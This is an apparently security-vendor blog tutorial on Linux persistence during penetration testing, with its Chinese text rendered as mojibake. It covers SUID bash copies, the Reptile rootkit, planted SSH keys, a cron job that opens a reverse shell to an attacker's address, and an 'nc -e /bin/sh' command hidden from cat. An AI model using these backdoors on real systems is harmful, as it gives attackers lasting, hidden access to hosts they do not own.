Ìá½»ÐèÇó
*
*

*
*
*
Á¢¼´Ìá½»
µã»÷¡±Á¢¼´Ìá½»¡±£¬±íÃ÷ÎÒÀí½â²¢Í¬Òâ ¡¶»Æ½ð³Ç¿Æ¼¼Òþ˽Ìõ¿î¡·

logo

    ²úÆ·Óë·þÎñ
    ½â¾ö·½°¸
    ¼¼ÊõÖ§³Ö
    ºÏ×÷·¢Õ¹
    ¹ØÓڻƽð³Ç

    ÉêÇëÊÔÓÃ
      »Æ½ð³Ç¹ÙÍøÊµÑéÊÒ | ÄÚÍøÉøÍ¸¡ªLinuxȨÏÞά³Ö¼¼ÇÉ×ܽá
      ·¢²¼Ê±¼ä£º2020-12-25 ÔĶÁ´ÎÊý£º 424 ´Î

      ÔÚÉÏһƪÎÄÕÂÖÐÎÒÃǽéÉÜÁËÄÚÍøÉøÍ¸ÖÐWindows»·¾³Ï½øÐÐȨÏÞά³Ö£¨µã»÷ÔĶÁ£©µÄ·½Ê½£¬±¾ÆÚÎÒÃǽ«ÊӽǼ¯ÖÐÔÚLinuxϵͳÖмÌÐø¶ÔÄÚÍøÉøÍ¸ÖеÄȨÏÞά³Ö·½Ê½½øÐÐ̽Ë÷¡£LinuxÒ²ÊÇÔÚÄÚÍøÉøÍ¸Öкܳ£¼ûµÄ²Ù×÷ϵͳ£¬µ«ÊÇÆäÄÚ²¿ÊµÏÖ·½Ê½È´ÓëWindowsÓÐ×ű¾ÖʵÄÇø±ð¡£ÎÒÃÇÔÚ¶ÔWindowsȨÏÞά³Ö·½Ê½µÄ»ù´¡ÉÏ×ܽáLinuxϵͳµÄȨÏÞά³Ö·½Ê½¡£


      01¡¢SUIDºóÃÅ


      SUIDÊÇSet uidµÄ¼ò³Æ£¬µ±Ò»¸öÎļþµÄËùÊôÖ÷µÄ±êʶλÊÇx£¬ÇÒËùÊôÖ÷Ϊrootʱ£¬µ±Ö´ÐиÃÎļþʱ£¬ÊÇÒÔrootÉí·ÝÖ´ÐеÄ¡£ËùÒÔÈç¹û¹¥»÷Õß´´½¨Ò»¸öÂú×ãÉÏÊöÌõ¼þµÄÎļþ£¬²¢ÇÒʹÓøÃÎļþ·´µ¯Ò»¸öbashµÄ»°£¬¾Í»áʹһ¸öÆÕͨÓû§µÃµ½Ò»¸örootȨÏÞµÄshell¡£

      ´´½¨Îļþʱ±ØÐë¾ß±¸ÒÔÏÂÌõ¼þ£º


      SUIDȨÏÞÖ»¶Ô¶þ½øÖƳÌÐòÓÐЧ£»


      Ö´ÐÐÕß¶ÔÓڸóÌÐòÐèÒª¾ßÓÐxµÄ¿ÉÖ´ÐÐȨÏÞ£»


      ±¾È¨ÏÞ½öÔÚÖ´ÐиóÌÐòµÄ¹ý³ÌÖÐÓÐЧ£»


      ÔÚÖ´Ðйý³ÌÖÐÖ´ÐÐÕß½«¾ßÓиóÌÐòÓµÓÐÕßµÄȨÏÞ£»


      Ê×ÏÈʹÓÃrootȨÏÞ´´½¨Ò»¸ösuidȨÏÞµÄÒþ²ØÎļþ£¬Õâ¸öÎļþÊÇ/bin/bashµÄ¸´ÖÆÎļþ¡£




      Æä´Î£¬Ê¹ÓÃÆÕͨÓû§µÇÈëϵͳ£¬Ê¹ÓÃÈçÏÂÃüÁî/var/.hack -p£¬Ö´ÐиÃÎļþÒÔ»ñµÃÒ»¸öroot shell£¬Ö´Ðкó¿ÉÒÔ¿´µ½È¨ÏÞÒѾ­±ä³ÉÁËrootȨÏÞ¡£




      02¡¢LinuxÄÚºËRootkitºóÃÅ

           

      Äں˼¶Linux RootkitµÄÒþ²ØÐÔͨ³£Òª½èÖú¶ÔLinuxϵͳµ÷ÓõĽػñÀ´´ïµ½Ä¿µÄ£¬²¢ÇÒÄÑÒÔ²éɱ¡¢ÄÑÒÔÇå³ý£¬Î£º¦¾Þ´ó¡£Ö÷ÒªÊÊÓõÄÄ¿±ê°æ±¾ÈçÏ£º


      Debian 9£º4.9.0-8-amd64


      Debian 10£º4.19.0-8-amd64


      Ubuntu 18.04.1 LTS£º4.15.0-38-generic


      Kali Linux£º4.18.0-kali2-amd64


      Centos 6.10£º2.6.32- 754.6.3.el6.x86_64


      Centos 7£º3.10.0-862.3.2.el7.x86_64


      Centos 8£º4.18.0-147.5.1.el8_1.x86_64


      ÏîÄ¿µØÖ·Îª£º

      https://github.com/f0rb1dd3n/Reptile


      03¡¢SSHºóÃÅ


      SSHÊÇLinuxÌṩµÄÒ»ÖÖÔ¶³ÌµÇ½·þÎñ£¬SSH×ܹ²ÌṩÁËÁ½ÖֵǽÑéÖ¤·½Ê½£ºÒ»ÊÇÕ˺ÅÃÜÂëµÇ¼£¬Ò²Êdz£Óõĵǽ·½Ê½£»¶þÊǹ«Ë½Ô¿µÇ¼£¬SSHÔÊÐíÑéÖ¤µÇ¼ÕßÌṩµÄ˽ԿÓë×ÔÉí¹«Ô¿ÊÇ·ñÆ¥Å䣬ÒÔÈ·¶¨ÊÇ·ñÔÊÐí¸ÃÓû§µÇ¼¡£¾ßÌåÑéÖ¤·½Ê½ÈçÏ£º




      Ê×Ïȹ¥»÷ÕßÔÚ±¾µØÉú³ÉÒ»·ÝSSHµÇ¼µÄ¹«Ë½Ô¿¶Ô£¬Ê¹ÓÃÈçÏÂÃüÁî¼´¿É£º


      ssh-keygen -trsa¡£




      ʹÓÃssh-keygenÉú³ÉÁ½·ÝÎļþ£¬·Ö±ðÊÇid_rsaºÍid_rsa.pubǰÕßÊÇ˽ԿÎļþ£¬ºóÕßÊǹ«Ô¿Îļþ¡£Ê¹ÓÃijÖÖ·½·¨£¬½«¹¥»÷ÕßÉú³ÉµÄ¹«Ô¿Îļþid_rsa.pubÉÏ´«½øÄ¿±ê»ú~/.ssh/authorized_keysĿ¼Ï¼´¿É¡£




      ʹÓÃsshÖ±½ÓµÇ¼Ŀ±ê»ú¼´¿É£¬ÎÞÐèÕ˺ÅÃÜÂë¡£




      04¡¢¼Æ»®ÈÎÎñºóÃÅ


      ÓëWindowsÒ»Ñù£¬LinuxÒ²ÌṩÁ˼ƻ®ÈÎÎñ³ÌÐò£¬ÔÚLinuxϵͳÖмƻ®ÈÎÎñÒ»°ãÊÇÓÉcron³Ðµ£¡£ÎÒÃÇʹÓÃcronÌí¼ÓÒ»¸ö·´µ¯shellµÄ¼Æ»®ÈÎÎñ£¬ÒÔʵÏÖȨÏÞά³Ö¡£


      Ê×Ïȼì²éÄ¿±ê»úÊÇ·ñ¿ªÆôÁ˼ƻ®ÈÎÎñ¡£




      ÀûÓÃcron³ÌÐòдÈëÒ»¸ö¼Æ»®ÈÎÎñ£º¡¯*/1 * * * * bash -I>& /dev/tcp/<¹¥»÷ÕßIP>/<¹¥»÷Õß¶Ë¿Ú> 0>&1¡¯Ê¹Æäÿһ·ÖÖÓÏò¹¥»÷ÕßIP·¢µ¯Ò»´Îshell¡£




      ÔÚ¹¥»÷»úÉϼàÌýÏàÓ¦µÄ¶Ë¿Ú£¬¹ýÁËÒ»·ÖÖÓ¼´¿É½ÓÊÕµ½À´×ÔÄ¿±ê»úµÄ·´µ¯shell£¬ÊµÏÖȨÏÞά³Ö¡£




      05¡¢CatÃüÁîȱÏݺóÃÅ


      CatÃüÁîÊÇLinuxϵͳ×Ô´øµÄÖ¸ÁÄܹ»²é¿´ÎļþµÄ¾ßÌåÄÚÈÝ¡£µ«ÊÇCatÖ¸ÁîÈ´´æÔÚȱÏÝ£¬catĬÈÏÊÇÖ§³ÖһЩÈç »Ø³µ·û »»Ðзûf»»Ò³·ûµÈÌØÊâ·ûºÅ£¬ÕâЩ·ûºÅ¿ÉÄܵ¼ÖÂһЩÄÚÈݱ»´íÎóµÄ½âÎö£¬½ø¶øÒþ²ØÒ»Ð©ÏµÍ³ÃüÁî¡£


      ´´½¨Ò»¸öpythonÎļþ£¬Ê¹ÆäÄܹ»Éú³ÉÒ»¸ö°üº¬ÌØÊâ·ûºÅµÄ.shÎļþ£¬Õâ¸öÎļþ¿ÉÒÔ½«¶ñÒâÖ¸Áî½øÐÐÒþ²Ø¡£



      ʹÓÃÆÕͨµÄcatÖ¸Áî²é¿´Õâ¸ö.shÎļþ£¬·¢ÏÖ¶ñÒâÖ¸Áî±»Òþ²Ø¡£ÖØÐÂʹÓÃcatÖ¸Áî´øÉÏ-A²ÎÊý¼´¿É¿´µ½¸ÃÎļþµÄÕæÊµÈ«²¿ÄÚÈÝ¡£¿ÉÒԲ鿴µ½¶ñÒâÖ¸Ánc -e /bin/sh 192.168.210.37 9999¡£


      Èç¹û¹ÜÀíԱûÓÐ×Ðϸ²é¿´ÎļþµÄ¾ßÌåÄÚÈݾÍÖ´ÐÐÁ˸ÃÎļþ£¬¹¥»÷»úÔò¿ÉÒÔ½Óµ½Ò»¸öÀ´×ÔÄ¿±ê»úµÄ·´µ¯shell¡£

      Ãâ·ÑÊÔÓÃ
      ·þÎñÈÈÏß

      ÂíÉÏ×Éѯ

      400-811-3777

      »Øµ½¶¥²¿
      ¡¾ÍøÕ¾µØÍ¼¡¿¡¾sitemap¡¿